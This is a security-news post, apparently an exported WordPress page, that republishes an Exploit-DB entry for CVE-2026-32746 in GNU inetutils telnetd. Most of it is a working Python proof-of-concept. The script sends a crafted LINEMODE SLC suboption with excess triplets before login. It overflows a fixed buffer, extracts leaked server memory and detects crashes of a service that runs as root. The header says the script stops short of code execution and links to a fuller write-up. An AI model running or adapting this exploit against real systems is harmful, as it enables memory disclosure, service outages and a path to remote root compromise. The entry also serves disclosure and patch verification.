{"id":52111,"date":"2026-05-07T10:34:46","date_gmt":"2026-05-07T10:34:46","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=52111"},"modified":"2026-05-07T10:34:46","modified_gmt":"2026-05-07T10:34:46","slug":"telnetd-27-buffer-overflow","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=52111","title":{"rendered":"telnetd 2.7 – Buffer Overflow_EDB-ID:52556"},"content":{"rendered":"

{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: telnetd 2.7 – Buffer Overflow Google Dork: N\/A Date: 2026-04-03 Exploit Author: Jeff Barron jeffaf Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/ Version: inetutils-telnetd…”,”published”:”2026-05-07T00:00:00″,”modified”:”2026-05-07T00:00:00″,”type”:”exploitdb”,”title”:”telnetd 2.7 – Buffer Overflow”,”source”:””,”references”:””,”id”:”EDB-ID:52556″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-32746″],”sourceData”:”# Exploit Title: telnetd 2.7 – Buffer Overflow\\r\\n# Google Dork: N\/A\\r\\n# Date: 2026-04-03\\r\\n# Exploit Author: Jeff Barron (jeffaf)\\r\\n# Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/\\r\\n# Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/\\r\\n# Version: inetutils-telnetd through 2.7 (patch pending in next release)\\r\\n# Tested on: Debian Linux (inetutils-telnetd 2.4 under xinetd, Docker lab)\\r\\n# CVE: CVE-2026-32746\\r\\n# CVSS: 9.8 (AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H)\\r\\n#\\r\\n# References:\\r\\n# DREAM Advisory: https:\/\/dreamgroup.com\/vulnerability-advisory-pre-auth-remote-code-execution-via-buffer-overflow-in-telnetd-linemode-slc-handler\/\\r\\n# WatchTowr: https:\/\/labs.watchtowr.com\/\\r\\n# GNU Disclosure: https:\/\/lists.gnu.org\/archive\/html\/bug-inetutils\/2026-03\/msg00031.html\\r\\n# Fix (PR #17): https:\/\/codeberg.org\/inetutils\/inetutils\/pulls\/17\\r\\n# NVD: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32746\\r\\n#\\r\\n# Notes:\\r\\n# The add_slc() function in telnetd\/slc.c appends 3 bytes per SLC triplet to a\\r\\n# fixed 108-byte buffer (slcbuf) with no bounds checking. Sending a crafted\\r\\n# LINEMODE SLC suboption with 40+ triplets (function codes \\u003e NSLC\/18) during\\r\\n# initial option negotiation — before any login prompt — overflows slcbuf,\\r\\n# corrupts the slcptr pointer, and leaks adjacent BSS data in the server\\r\\n# response. telnetd runs as root via inetd\/xinetd; the vendor advisory (DREAM\\r\\n# Security, Advisory ID: VULN-TELNETD-SLC-2025, published 2026-03-13) confirms\\r\\n# full pre-auth RCE as root is achievable. This PoC demonstrates and verifies\\r\\n# the overflow via response analysis (BSS leak in server reply). It does NOT\\r\\n# include shellcode or a ROP chain. Full exploitation analysis including byte\\r\\n# constraints, alignment techniques, and the def_slcbuf\/free() primitive on\\r\\n# 32-bit systems is covered in the WatchTowr writeup linked above.\\r\\n# Docker lab: https:\/\/github.com\/jeffaf\/cve-2026-32746\\r\\n#\\r\\n# Vulnerability discovered by: Adiel Sol, Arad Inbar, Erez Cohen, Nir Somech,\\r\\n# Ben Grinberg, Daniel Lubel (Dream Security Research Labs). Disclosed 2026-03-13.\\r\\n# This is an independent PoC implementation.\\r\\n\\r\\n\\”\\”\\”\\r\\nCVE-2026-32746 – telnetd LINEMODE SLC Buffer Overflow PoC\\r\\n==========================================================\\r\\n\\r\\nTriggers an out-of-bounds write in GNU InetUtils telnetd’s SLC handler\\r\\nby sending a crafted LINEMODE SLC suboption with excess triplets.\\r\\n\\r\\nThe overflow corrupts the slcptr pointer in BSS. When end_slc() runs,\\r\\nit writes via the corrupted pointer. The server’s SLC response contains\\r\\nthe overflow data (leaked BSS bytes), providing direct proof.\\r\\n\\r\\nThis PoC demonstrates and verifies the overflow via response analysis.\\r\\nIt does NOT achieve code execution.\\r\\n\\r\\nUsage:\\r\\n python3 exploit.py \\u003ctarget_ip\\u003e [port]\\r\\n\\r\\nFor authorized security testing only.\\r\\n\\”\\”\\”\\r\\n\\r\\nimport argparse\\r\\nimport socket\\r\\nimport sys\\r\\nimport time\\r\\n\\r\\n# Telnet protocol bytes\\r\\nIAC = 0xFF\\r\\nDONT = 0xFE\\r\\nDO = 0xFD\\r\\nWONT = 0xFC\\r\\nWILL = 0xFB\\r\\nSB = 0xFA\\r\\nSE = 0xF0\\r\\n\\r\\n# Options\\r\\nOPT_ECHO = 0x01\\r\\nOPT_SGA = 0x03\\r\\nOPT_TTYPE = 0x18 # 24\\r\\nOPT_TSPEED = 0x20 # 32\\r\\nOPT_LINEMODE = 0x22 # 34\\r\\nOPT_XDISPLOC = 0x23 # 35\\r\\nOPT_OLD_ENVIRON = 0x24 # 36\\r\\nOPT_NEW_ENVIRON = 0x27 # 39\\r\\nOPT_NAWS = 0x1F # 31\\r\\n\\r\\n# LINEMODE suboption codes\\r\\nLM_SLC = 0x03\\r\\n\\r\\n# SLC constants from source\\r\\nNSLC = 18 # Number of defined SLC functions\\r\\n\\r\\n# Buffer geometry\\r\\nSLCBUF_SIZE = 108 # Total slcbuf allocation\\r\\nSLCBUF_USABLE = 104 # Usable after 4-byte header (IAC SB LINEMODE SLC)\\r\\n\\r\\n\\r\\ndef recv_all(s, timeout=2):\\r\\n \\”\\”\\”Receive all available data with a timeout.\\”\\”\\”\\r\\n s.settimeout(timeout)\\r\\n chunks = []\\r\\n try:\\r\\n while True:\\r\\n chunk = s.recv(4096)\\r\\n if not chunk:\\r\\n break\\r\\n chunks.append(chunk)\\r\\n except socket.timeout:\\r\\n pass\\r\\n return b”.join(chunks)\\r\\n\\r\\n\\r\\ndef negotiate_linemode(s):\\r\\n \\”\\”\\”Complete telnet negotiation and enter LINEMODE.\\r\\n\\r\\n Full negotiation is required: the server only processes SLC and\\r\\n returns responses after all expected suboptions (TTYPE, TSPEED,\\r\\n XDISPLOC, NEW_ENVIRON, NAWS) have been received.\\r\\n \\”\\”\\”\\r\\n # Round 1: Read server’s initial option offers\\r\\n print(\\”[*] Phase 1: Reading server negotiation…\\”)\\r\\n time.sleep(1)\\r\\n\\r\\n try:\\r\\n data = recv_all(s)\\r\\n except ConnectionResetError:\\r\\n # Server closed connection before we could send or receive\\r\\n print(f\\”[-] Connection reset during negotiation\\”)\\r\\n return False\\r\\n\\r\\n if not data:\\r\\n print(\\”[-] No negotiation data received\\”)\\r\\n return False\\r\\n\\r\\n print(f\\” Received {len(data)} bytes of negotiation\\”)\\r\\n\\r\\n # Build responses: accept everything, add WILL LINEMODE\\r\\n resp = bytearray()\\r\\n i = 0\\r\\n while i \\u003c len(data) – 2:\\r\\n if data[i] == IAC:\\r\\n cmd = data[i + 1]\\r\\n opt = data[i + 2]\\r\\n if cmd == DO:\\r\\n resp.extend([IAC, WILL, opt])\\r\\n elif cmd == WILL:\\r\\n resp.extend([IAC, DO, opt])\\r\\n i += 3\\r\\n else:\\r\\n i += 1\\r\\n\\r\\n # Proactively offer LINEMODE (triggers server’s SLC handler)\\r\\n resp.extend([IAC, WILL, OPT_LINEMODE])\\r\\n\\r\\n # Required suboption responses – server stalls without these\\r\\n resp.extend([IAC, SB, OPT_TTYPE, 0x00])\\r\\n resp.extend(b’xterm’)\\r\\n resp.extend([IAC, SE])\\r\\n\\r\\n resp.extend([IAC, SB, OPT_TSPEED, 0x00])\\r\\n resp.extend(b’38400,38400′)\\r\\n resp.extend([IAC, SE])\\r\\n\\r\\n resp.extend([IAC, SB, OPT_XDISPLOC, 0x00])\\r\\n resp.extend(b’:0′)\\r\\n resp.extend([IAC, SE])\\r\\n\\r\\n resp.extend([IAC, SB, OPT_NEW_ENVIRON, 0x00, IAC, SE])\\r\\n resp.extend([IAC, SB, OPT_OLD_ENVIRON, 0x00, IAC, SE])\\r\\n\\r\\n s.send(resp)\\r\\n print(f\\” Sent {len(resp)} bytes (negotiation + WILL LINEMODE)\\”)\\r\\n\\r\\n # Round 2: Server sends DO LINEMODE + additional option requests\\r\\n print(\\”[*] Phase 2: Completing negotiation…\\”)\\r\\n time.sleep(1)\\r\\n data2 = recv_all(s, timeout=3)\\r\\n\\r\\n if not data2:\\r\\n print(\\”[-] No response to LINEMODE offer\\”)\\r\\n return False\\r\\n\\r\\n got_linemode = False\\r\\n resp2 = bytearray()\\r\\n i = 0\\r\\n while i \\u003c len(data2) – 2:\\r\\n if data2[i] == IAC:\\r\\n cmd = data2[i + 1]\\r\\n if cmd == SB:\\r\\n # Find end of suboption\\r\\n j = i + 2\\r\\n while j \\u003c len(data2) – 1:\\r\\n if data2[j] == IAC and data2[j + 1] == SE:\\r\\n break\\r\\n j += 1\\r\\n opt = data2[i + 2]\\r\\n if opt == OPT_TTYPE and i + 3 \\u003c len(data2) and data2[i + 3] == 0x01:\\r\\n resp2.extend([IAC, SB, OPT_TTYPE, 0x00])\\r\\n resp2.extend(b’xterm’)\\r\\n resp2.extend([IAC, SE])\\r\\n elif opt == OPT_NEW_ENVIRON:\\r\\n resp2.extend([IAC, SB, OPT_NEW_ENVIRON, 0x00, IAC, SE])\\r\\n i = j + 2\\r\\n elif cmd == DO:\\r\\n opt = data2[i + 2]\\r\\n if opt == OPT_LINEMODE:\\r\\n got_linemode = True\\r\\n resp2.extend([IAC, WILL, opt])\\r\\n if opt == OPT_NAWS:\\r\\n resp2.extend([IAC, SB, OPT_NAWS,\\r\\n 0x00, 0x50, 0x00, 0x18, IAC, SE])\\r\\n i += 3\\r\\n elif cmd == WILL:\\r\\n resp2.extend([IAC, DO, data2[i + 2]])\\r\\n i += 3\\r\\n elif cmd in (DONT, WONT):\\r\\n i += 3\\r\\n else:\\r\\n i += 2\\r\\n else:\\r\\n i += 1\\r\\n\\r\\n if resp2:\\r\\n s.send(resp2)\\r\\n\\r\\n if got_linemode:\\r\\n print(\\”[+] Server accepted LINEMODE (DO LINEMODE received)\\”)\\r\\n else:\\r\\n print(\\”[-] Server did not accept LINEMODE\\”)\\r\\n print(\\” This may not be GNU InetUtils telnetd\\”)\\r\\n return False\\r\\n\\r\\n # Round 3: Wait for terminal setup and login prompt\\r\\n # Server sends SLC defaults + login prompt after full negotiation\\r\\n time.sleep(3)\\r\\n data3 = recv_all(s, timeout=5)\\r\\n if data3:\\r\\n # Respond to any remaining option requests\\r\\n resp3 = bytearray()\\r\\n i = 0\\r\\n while i \\u003c len(data3) – 2:\\r\\n if data3[i] == IAC:\\r\\n cmd = data3[i + 1]\\r\\n if cmd == DO:\\r\\n resp3.extend([IAC, WILL, data3[i + 2]])\\r\\n i += 3\\r\\n elif cmd == WILL:\\r\\n resp3.extend([IAC, DO, data3[i + 2]])\\r\\n i += 3\\r\\n elif cmd == SB:\\r\\n j = i + 2\\r\\n while j \\u003c len(data3) – 1:\\r\\n if data3[j] == IAC and data3[j + 1] == SE:\\r\\n break\\r\\n j += 1\\r\\n i = j + 2\\r\\n else:\\r\\n i += 3 if cmd in (DONT, WONT) else i + 2\\r\\n else:\\r\\n i += 1\\r\\n if resp3:\\r\\n s.send(resp3)\\r\\n\\r\\n return True\\r\\n\\r\\n\\r\\ndef build_slc_payload(num_triplets):\\r\\n \\”\\”\\”Build a malicious SLC suboption with overflow triplets.\\r\\n\\r\\n Each triplet has a function code \\u003e NSLC (18), which forces\\r\\n add_slc() to queue a \\”not supported\\” reply. After ~35 triplets,\\r\\n the 104-byte response buffer overflows.\\r\\n\\r\\n Buffer math:\\r\\n slcbuf = 108 bytes total\\r\\n Header = 4 bytes (IAC SB LINEMODE LM_SLC)\\r\\n Usable = 104 bytes\\r\\n Per triplet reply = 3 bytes\\r\\n Overflow at: 104 \/ 3 = ~34.6 -\\u003e triplet 35\\r\\n \\”\\”\\”\\r\\n payload = bytearray()\\r\\n\\r\\n # Suboption header: IAC SB LINEMODE LM_SLC\\r\\n payload.extend([IAC, SB, OPT_LINEMODE, LM_SLC])\\r\\n\\r\\n # SLC triplets: (function, flags, value)\\r\\n # function \\u003e NSLC triggers the vulnerable add_slc() path\\r\\n for i in range(num_triplets):\\r\\n func = NSLC + 1 + i\\r\\n if func \\u003e= IAC: # Can’t use 0xFF (IAC) in data\\r\\n func = 0xFE\\r\\n payload.extend([func, 0x02, 0x00]) # flag=SLC_NOSUPPORT, value=0\\r\\n\\r\\n # Suboption trailer: IAC SE\\r\\n payload.extend([IAC, SE])\\r\\n\\r\\n return payload\\r\\n\\r\\n\\r\\ndef find_slc_response(data):\\r\\n \\”\\”\\”Extract SLC suboption body from telnet data.\\r\\n\\r\\n Returns the SLC body bytes (between header and IAC SE),\\r\\n or None if no SLC suboption found.\\r\\n \\”\\”\\”\\r\\n i = 0\\r\\n while i \\u003c len(data) – 3:\\r\\n if (data[i] == IAC and data[i + 1] == SB and\\r\\n data[i + 2] == OPT_LINEMODE and\\r\\n i + 3 \\u003c len(data) and data[i + 3] == LM_SLC):\\r\\n # Found SLC suboption, extract body until IAC SE\\r\\n k = i + 4\\r\\n while k \\u003c len(data) – 1:\\r\\n if data[k] == IAC and data[k + 1] == SE:\\r\\n return data[i + 4:k]\\r\\n k += 1\\r\\n # Unterminated – return what we have\\r\\n return data[i + 4:]\\r\\n i += 1\\r\\n return None\\r\\n\\r\\n\\r\\ndef check_service_alive(host, port):\\r\\n \\”\\”\\”Verify service state with a fresh connection.\\”\\”\\”\\r\\n try:\\r\\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\r\\n s.settimeout(5)\\r\\n s.connect((host, port))\\r\\n probe = recv_all(s, timeout=3)\\r\\n s.close()\\r\\n return True, len(probe)\\r\\n except (socket.error, OSError):\\r\\n return False, 0\\r\\n\\r\\n\\r\\ndef exploit(host, port, triplets, timeout):\\r\\n \\”\\”\\”Send the SLC overflow payload and verify via response analysis.\\”\\”\\”\\r\\n\\r\\n print(f\\”\\\\n{‘=’ * 60}\\”)\\r\\n print(f\\” CVE-2026-32746 – telnetd SLC Buffer Overflow PoC\\”)\\r\\n print(f\\”{‘=’ * 60}\\”)\\r\\n print(f\\” Target: {host}:{port}\\”)\\r\\n print(f\\” Triplets: {triplets} (overflow at ~35)\\”)\\r\\n print(f\\”{‘=’ * 60}\\\\n\\”)\\r\\n\\r\\n # Connect\\r\\n try:\\r\\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\r\\n s.settimeout(timeout)\\r\\n s.connect((host, port))\\r\\n print(f\\”[+] Connected to {host}:{port}\\”)\\r\\n except (socket.error, OSError) as e:\\r\\n print(f\\”[-] Connection failed: {e}\\”)\\r\\n return False\\r\\n\\r\\n # Negotiate into LINEMODE\\r\\n if not negotiate_linemode(s):\\r\\n print(\\”\\\\n[-] Failed to enter LINEMODE – cannot trigger vulnerability\\”)\\r\\n s.close()\\r\\n return False\\r\\n\\r\\n # Build and send the overflow payload\\r\\n payload = build_slc_payload(triplets)\\r\\n data_bytes = triplets * 3\\r\\n overflow_bytes = data_bytes – SLCBUF_USABLE\\r\\n print(f\\”\\\\n[*] Phase 3: Sending malicious SLC suboption\\”)\\r\\n print(f\\” Payload size: {len(payload)} bytes\\”)\\r\\n print(f\\” SLC triplets: {triplets}\\”)\\r\\n print(f\\” Buffer size: {SLCBUF_USABLE} bytes (usable)\\”)\\r\\n print(f\\” Data written: {data_bytes} bytes\\”)\\r\\n print(f\\” Overflow: {overflow_bytes} bytes past buffer end\\”)\\r\\n\\r\\n try:\\r\\n s.send(payload)\\r\\n print(f\\”[+] Payload sent\\”)\\r\\n except (BrokenPipeError, ConnectionResetError):\\r\\n print(\\”[+] Connection reset during send – server crashed\\”)\\r\\n s.close()\\r\\n return True\\r\\n\\r\\n # Phase 4: Verify overflow via SLC response analysis\\r\\n print(f\\”\\\\n[*] Phase 4: Analyzing server response…\\”)\\r\\n time.sleep(2)\\r\\n\\r\\n overflow_confirmed = False\\r\\n crash_detected = False\\r\\n\\r\\n try:\\r\\n resp = recv_all(s, timeout=3)\\r\\n if resp:\\r\\n slc_body = find_slc_response(resp)\\r\\n if slc_body is not None:\\r\\n print(f\\” SLC response body: {len(slc_body)} bytes\\”)\\r\\n print(f\\” Expected (no overflow): {SLCBUF_USABLE} bytes max\\”)\\r\\n\\r\\n if len(slc_body) \\u003e SLCBUF_USABLE:\\r\\n leak_count = len(slc_body) – SLCBUF_USABLE\\r\\n overflow_confirmed = True\\r\\n print(f\\”[+] OVERFLOW CONFIRMED: {leak_count} bytes past buffer boundary\\”)\\r\\n print(f\\” Server response contains leaked BSS memory\\”)\\r\\n\\r\\n # Show leaked data\\r\\n leaked = slc_body[SLCBUF_USABLE:]\\r\\n hex_dump = ‘ ‘.join(f'{b:02x}’ for b in leaked[:48])\\r\\n print(f\\” Leaked BSS: {hex_dump}\\”\\r\\n f\\”{‘…’ if len(leaked) \\u003e 48 else ”}\\”)\\r\\n elif len(slc_body) == data_bytes:\\r\\n # Server wrote all triplet data without truncation\\r\\n overflow_confirmed = True\\r\\n print(f\\”[+] OVERFLOW CONFIRMED: server wrote {len(slc_body)} bytes \\”\\r\\n f\\”into {SLCBUF_USABLE}-byte buffer\\”)\\r\\n else:\\r\\n print(f\\”[!] SLC response within buffer bounds ({len(slc_body)} bytes)\\”)\\r\\n else:\\r\\n print(f\\”[!] Server responded ({len(resp)} bytes) but no SLC suboption found\\”)\\r\\n else:\\r\\n print(\\”[!] No response data received\\”)\\r\\n except (ConnectionResetError, BrokenPipeError, OSError) as e:\\r\\n print(f\\”[+] Connection error after payload: {e}\\”)\\r\\n crash_detected = True\\r\\n\\r\\n s.close()\\r\\n\\r\\n # Verify service state regardless of response analysis\\r\\n if not overflow_confirmed and not crash_detected:\\r\\n print(\\”\\\\n[*] Checking service state with fresh connection…\\”)\\r\\n alive, probe_len = check_service_alive(host, port)\\r\\n if alive:\\r\\n print(f\\”[*] Service still running ({probe_len} bytes on connect)\\”)\\r\\n print(\\”[!] Overflow could not be verified via response analysis\\”)\\r\\n print(\\” Server may require additional negotiation steps,\\”)\\r\\n print(\\” or this telnetd version may not be vulnerable\\”)\\r\\n else:\\r\\n print(\\”[+] Service is DOWN after payload – crash confirmed\\”)\\r\\n crash_detected = True\\r\\n\\r\\n # Final verdict\\r\\n if overflow_confirmed:\\r\\n print(f\\”\\\\n[+] VULNERABLE – CVE-2026-32746 confirmed\\”)\\r\\n print(f\\” Out-of-bounds write in SLC handler verified\\”)\\r\\n print(f\\” Server response proves buffer overflow occurred\\”)\\r\\n return True\\r\\n elif crash_detected:\\r\\n print(f\\”\\\\n[+] VULNERABLE – CVE-2026-32746 (crash)\\”)\\r\\n print(f\\” Server process terminated after overflow payload\\”)\\r\\n return True\\r\\n else:\\r\\n print(f\\”\\\\n[-] Could not confirm vulnerability\\”)\\r\\n return False\\r\\n\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(\\r\\n description=\\”CVE-2026-32746 – telnetd SLC Buffer Overflow PoC\\”,\\r\\n epilog=\\”For authorized security testing only.\\”\\r\\n )\\r\\n parser.add_argument(\\”host\\”, help=\\”Target IP address\\”)\\r\\n parser.add_argument(\\”port\\”, type=int, nargs=\\”?\\”, default=23,\\r\\n help=\\”Target port (default: 23)\\”)\\r\\n parser.add_argument(\\”-n\\”, \\”–triplets\\”, type=int, default=60,\\r\\n help=\\”Number of SLC triplets to send (default: 60, overflow at ~35)\\”)\\r\\n parser.add_argument(\\”-t\\”, \\”–timeout\\”, type=int, default=10,\\r\\n help=\\”Socket timeout in seconds (default: 10)\\”)\\r\\n args = parser.parse_args()\\r\\n\\r\\n success = exploit(args.host, args.port, args.triplets, args.timeout)\\r\\n\\r\\n sys.exit(0 if success else 1)\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52556″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52556″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: telnetd 2.7 – Buffer Overflow Google Dork: N\/A Date: 2026-04-03 Exploit Author: Jeff Barron jeffaf Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/ Version: inetutils-telnetd…”,”published”:”2026-05-07T00:00:00″,”modified”:”2026-05-07T00:00:00″,”type”:”exploitdb”,”title”:”telnetd…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-52111","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\ntelnetd 2.7 - Buffer Overflow_EDB-ID:52556 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=52111\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"telnetd 2.7 - Buffer Overflow_EDB-ID:52556 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: telnetd 2.7 – Buffer Overflow Google Dork: N\/A Date: 2026-04-03 Exploit Author: Jeff Barron jeffaf Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/ Version: inetutils-telnetd…”,”published”:”2026-05-07T00:00:00″,”modified”:”2026-05-07T00:00:00″,”type”:”exploitdb”,”title”:”telnetd...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=52111\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-07T10:34:46+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52111#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52111\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"telnetd 2.7 – Buffer Overflow_EDB-ID:52556\",\"datePublished\":\"2026-05-07T10:34:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52111\"},\"wordCount\":3042,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52111#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52111\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52111\",\"name\":\"telnetd 2.7 - Buffer Overflow_EDB-ID:52556 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-07T10:34:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52111#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52111\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52111#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"telnetd 2.7 – Buffer Overflow_EDB-ID:52556\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"telnetd 2.7 - Buffer Overflow_EDB-ID:52556 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=52111","og_locale":"en_US","og_type":"article","og_title":"telnetd 2.7 - Buffer Overflow_EDB-ID:52556 - zero redgem","og_description":"{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: telnetd 2.7 – Buffer Overflow Google Dork: N\/A Date: 2026-04-03 Exploit Author: Jeff Barron jeffaf Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/ Version: inetutils-telnetd…”,”published”:”2026-05-07T00:00:00″,”modified”:”2026-05-07T00:00:00″,”type”:”exploitdb”,”title”:”telnetd...","og_url":"https:\/\/zero.redgem.net\/?p=52111","og_site_name":"zero redgem","article_published_time":"2026-05-07T10:34:46+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=52111#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=52111"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"telnetd 2.7 – Buffer 